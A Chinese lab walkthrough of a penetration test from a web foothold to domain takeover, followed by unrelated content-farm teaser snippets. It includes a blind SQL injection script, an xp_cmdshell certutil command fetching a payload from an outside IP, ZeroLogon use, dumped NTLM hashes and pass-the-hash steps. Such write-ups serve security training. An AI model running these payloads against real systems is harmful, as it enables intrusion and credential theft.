范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

域渗透之外网打点到三层内网

  环境搭建1.项目介绍:
  本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。  2.VPS映射
  1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini
  在web1上配置frpc.ini 运行 frpc.exe -c frp.ini
  成功访问到环境
  http://x.x.x.x:8088/login.jsp
  信息收集1.端口探测
  使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。
  然后查看其详细信息。
  2.网站源代码查找
  发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。
  然后就在github试试运气,发现了源码。
  源码地址:https://github.com/amateur-RD/netBank-System
  发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。
  3.SQL注入
  然后进行登录测试,发现存在sql注入漏洞
  网上银行系统Hsql注入漏洞
  使用sqlmap不能进行跑出用户名和密码。
  4.编写脚本进行sql注入coding:utf-8import requests password="" url="[http://x.x.x.x:8878/admin/login"](http://103.121.93.206:8878/admin/login") payload="0123456789abcdefghijklmnopqrstuvwxyz" password="" for i in range(1,20):  for j in payload:    exp = "admin" and(select substring(password,%s,1) from Admin) like "%s" or "1"="" %(i,j)    print("正在注入")    data = {"admin.username": exp, "admin.password": "aaaa", "type": 1}    req = requests.post(url=url, data=data);    if "密码不正确" in req.text:      password+=j      break print(password)
  成功跑出密码。然后进行登录。
  登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。
  5.tomexam SQL注入漏洞
  在另一个地址处,发现可以注册用户。然后注册用户进行登录。
  登录之后发现,某处存在sql注入。
  使用sqlmap进行获取用户信息。
  | 1 | 1 | 1399999999 | 1 | 超级管理员 | admin | admin | 17D03DA6474CE8BEB13B01E79F789E63 | 2022-04-09 00:14:08 | 301 |
  | 6 | 2 | | 1 | | eu3 | eu3 | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14
  成功抓到了管理员用户和密码,然后使用md5进行解密。
  成功进行登录。登录之后没有找到可getshell的地方。
  6.Jspxcms-SQL注入
  首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
  发现先知的大佬做过找个版本的代码审计。参考链接:https://xz.aliyun.com/t/10891?page=1#toc-7。发现可以通过文件上传进行gethshell。
  在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
  使用sqlmap进行查找表、用户和吗密码。
  成功发现了用户名和加密的密码。密码推断是明文密码+salt然后再进行md5加密。
  7.编写解密脚本
  通过其源码,分析其加密方式,然后编写解密脚本。  package com.jspxcms.core; import com.jspxcms.common.security.SHA1CredentialsDigest; import com.jspxcms.common.util.Encodes; import java.io.File; import java.io.FileReader; import java.io.FileWriter; import java.io.PrintWriter; import java.util.Scanner; public class Testmain {   public static void main(String[] args)throws Exception {     byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");     SHA1CredentialsDigest test = new SHA1CredentialsDigest();     String fileName = "D:csdnpass.txt";     String fileName2 = "D:hashpassword2.txt";     try (Scanner sc = new Scanner(new FileReader(fileName))) {       while (sc.hasNextLine()) {         String line = sc.nextLine();         String encPass = test.digest(line, salt);         File f = new File(fileName2);         FileWriter fw = new FileWriter(f, true);         PrintWriter pw = new PrintWriter(fw);         pw.println(line + " " + encPass);         pw.close();      }    }  } }
  8.登录jspxcms后台getshell
  使用管理员用户和解密出来的密码,成功进入管理员后台。
  使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
  9.编写目录穿越脚本
  根据先知社区的大佬提出的方法,编写目录穿越脚本。
  成功进行上传。
  10.获取webshell
  使用哥斯拉连接webshell,成功执行命令。
  内网渗透:1.frp反向代理上线CS
  首先配置内网cobalt strike内网上线
  在kali启动cs服务端,
  查看其端口
  配置frp的frps.ini信息。
  2.CS上线
  cs生成监听。
  然后上传.exe文件进行上线。
  成功上线。
  3.内网信息收集
  使用shell iponfig 收集信息。
  根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
  查看计算机名。
  使用net view 查找域内其它主机,发现不能找到其他主机。
  4.开启代理进行端口扫描
  查看server2012的IP地址。
  5.域内主机端口扫描
  发现存在1433——Mysql的端口,尝试进行弱口令的暴力破解。
  最好成功爆破出账号和密码.
  6.mssqlclient 登录Mssql服务器
  使用mysql用户和密码进行登录。
  7.xp_cmshell进行getshell
  help查看可以执行那些命令。
  开启xp_cmdshell,然后进行信息收集。
  使用certutil远程下载之前的木马,然后进行上线
  xp_cmdshell certutil -urlcache -split -f http://39.103.134.134/artifact.exe
  c:/windows/temp/artifact.exe
  8.使用SweetPotato (ms16-075)提权
  上线之后,进行简单的信息收集。
  然后使用第三方插件,利用SweetPotato (ms16-075)提权对其进行提权。
  成功提权。
  内网域渗透1.内网域信息收集
  使用net view查看域内主机。
  使用hashdump进行抓取一些用户的hash值。
  查看主机ip地址。
  查看域控的Ip地址,和域控的计算机名。
  2.ZeroLogon CVE-2020-1472 获取域控权限
  编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。
  将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0
  3.配置代理,登录域控
  配置kali的代理地址,然后进行端口扫描,测试代理是否连接。
  获取域控的hash值。
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
  sec123.cnkcnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
  AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::
  然后进行登录域控。
  4.PTH上线CS
  关闭防火墙,利用pth进行上线cs。
  成功执行命令。
  生成tcp监听,然后jump到域控主机。
  5.恢复密码、原hash。
  恢复密码。
  使用 secretsdump.py获取其hash值。
  python3 secretsdump.py -sam sam.save -system system.save -security
  security.save LOCA
  使用:proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139
  fb61e3c372e666adccb7a820aa39772f恢复域控密码。成功恢复其密码。
  靶机到这里就结束了。
  最后,成功拿下整个域控。
  总结:
  该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。
  申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关 本文原创作者: vghost

中国紧急曝光!百雀羚硫磺皂都上榜,建议看看你用过没面膜的种类实在是太多了,一不小心就踩雷了选不到好的护肤品,好多女生就会上网查偏方尤其是皮肤不好的时候用什么硫磺皂洗脸白醋洗脸,涂抹牙膏等等这些方法不仅不会让皮肤越来越好而且不科学,男人对女人的想念有两种,第二种才是真爱什么是思念?扎西拉姆说,思念是一种你见,或者不见我,我就在那里,不悲不喜的记挂与执念沈从文说,思念是一种在青山绿水之间,我想牵着你的手,走过这座桥,桥的那头是青丝,桥的这头是白发的5种含天然叶酸的食物,西兰花倒数第一,南瓜第二,建议了解随着年龄的不断增长,越来越多的中老年人开始重视身体健康问题了。毕竟身体才是革命的本钱,咱们中老年人只有拥有一个健康的体魄,才能好好享受生活,少让儿女操心。叶酸是人体必不可少的一种物为什么越穷的女人皮肤越好?为什么说越穷的女人皮肤越好呢?因为大部分有钱的女人太想拥有好皮肤了,所以会花很多钱买各种护肤品上脸用,也会去各大美容院去做这个做那个,最后的结果就是,脸越用越烂。虽然说90的女性在芒种吃3宝,仲夏无病扰,五月初八芒种,3宝怎么吃?人不管走到哪一步,总得找点乐子,想一点办法。是的,美食就是我找的乐子,想的办法!小谈食刻和你一起认真对待吃下的食物!导读芒种,二十四节气中的第九个节气,也是夏季的第三个节气,今年端来自全世界最健康的饮食习惯1。法国慢餐当你像许多法国人一样慢慢地吃东西,细细品味时,可能会减少热量,尤其是对男性而言。所以慢慢来,和朋友一起享受一顿丰盛的晚餐。2。日本少量和小菜小菜通常意味着热量更少。研究中医日有所病,夜有所梦是啥意思?睡觉多梦,吃啥能缓解?睡觉是人类正常的生理行为,通过睡眠来恢复精力,保证第二天的工作和生活质量。而做梦,相当于是在我们睡眠中的一个小插曲,大多数人对其知之甚少。梦境也是分好坏的,做了美梦,可能第二天的心睡觉时,空调温度调到多少比较好?并非26度,这个温度舒服还省电如今夏天已经到来,天气越来越炎热,空调已经成为必不可少的东西,对于怕热的人而言,待在空调房中无疑是最好的降暑方法。空调的出现,让人们在烈日炎炎的时候有了一方清凉之地,甚至有些人连睡科普小知识食用油在出现哈败味后还能吃吗?你有没有发现,家里的食用油经过一段时间后,就出现了异味,如出现哈败味,俗称哈喇味。对于这样的食用油你还会继续食用吗?平时家里正在吃的食用油,如果担心氧化问题,可以通过嗅闻的方式来判钟南山一日三餐公开,网友干得很好,可惜我做不到由于我国刚经历疫情,大家提到医生的第一反应都是钟南山院士。1936年出生的他至今已有85岁高龄。那么问题来了,为什么他岁数那么大,身体还这么健康,精神还这么饱满呢?最重要的就是他能抄书打卡第二天,营养和生命之间什么关系吃对了少生病营养和生命之间什么关系食物中的营养素血液渗透入细胞有用的吸收(组织结构)无用的排出(血液,呼吸,肝脏,尿液排出)这一系列叫新陈代谢什么东西能进入细胞里去呢?营养素(蛋白
谁怕谁,不是郭台铭说了算有很多台商在中国大陆都有不错的发展,比如郭台铭的富士康。富士康在大陆市场发展也有几十年的历史了,在各地城市都有建设代工厂,解决了当地的就业问题,促进了经济发展。这也让郭台铭有了盲目人民艺术家许昕对于许昕,球迷们有各种各样的称呼大蟒昕爷人民艺术家盲打选手,从这些爱称中不难看出,球迷们对许昕有着殷切的希望和喜爱。硕果仅存的直板选手在横板选手肆虐的今天,能无视反手差距,跻身超一谢霆锋大儿子烫上泡面头神似谢霆锋终,不愧是亲父子大家都知道,张柏芝跟谢霆锋两个明星,之前的时候是一对夫妻。只不过因为各种的原因,最终导致离婚了。不过他们两个却有一对特别可爱的儿子,分别是谢振轩和谢振南。尤其是他的大儿子谢振轩,从远程电脑开机不求人,向日葵开机盒子K3开箱评测2021你隔离过没?2021年似乎每个人或多或少都在家办公过,有时候还要依托在办公室坚守的同事帮忙开电脑发过来个文件啥的,后来公司索性鼓励大家都居家办公,久而久之很多人就懒得去公司年底换机怎么选?XIAOMI12和iPhone13哪个更值得买?年底正是换新机的好时候,我一直想换一台小尺寸的手机,在iPhone13mini和XIAOMI12之间挣扎,不知道选哪个,综合了网上的评测和线下试机体验,大家给我分析分析。手感方面在云顶12。1改动卡莎属性下调,名流三重削弱,春哥遭重厄加特躺枪由于之前正处于假期,所以云顶之弈没有做任何相关的更新,畸形的卡莎之弈版本,让很多运气不佳的脸黑玩家游戏体验感极差,在明知大概率抽不到五费卡的情况下,也只能硬着头皮加入,常处于苟分边赵丽蓉改嫁小叔子后丧夫又丧女,晚年为自己选遗照宫廷玉液酒,一百八一杯。相信喜欢看小品的人,对这话一定很熟悉。而说这句话的人,可能对现在的年轻一代来说会有点陌生。她就是被称为人民艺术家的赵丽蓉老师。自从1988年第一次登上春晚舞相约老南街在两当城里,保留着这样一条完整的老街老南街。两百余年的历史沉淀,成就了今天老南街的烟火与诗意,它经历过岁月的积淀,见证着尘世的繁华与凄凉,镌刻着这座城刻骨铭心的辉煌。从老街的青石板AG超玩会一诺称霸巅峰赛,7个小时只输了2局,Fly看服气了如果你也看了AG超玩会最近的直播,就应该知道一诺现在上分特别轻松,可以说在7个小时的游戏中,他只输了两局,这让很多人觉得惊讶。一诺果然还是那个顶级射手,实力极其强悍,天赋也很惊人,中医看风湿,不过是寒邪作祟罢了,几味药帮你解决今天来聊一聊类风湿,很多人觉得自己得了类风湿会不会就好不了,或者以后就得一直吃药,但其实并不是这样,今天就从中医的角度来聊一聊类风湿。类风湿这种疾病在老年朋友身上比较多见,患者最主为什么一到凌晨34点就醒来?中医坦言可能跟这4个因素有关不知道大家是否经常半夜三更醒来,或许是被尿憋醒,或许是被渴醒,当然有一些人是因为外界因素而醒来,当这些外界因素解决之后,就会又迅速入睡,然而生活当中却有一些人总是半夜三四点钟醒来,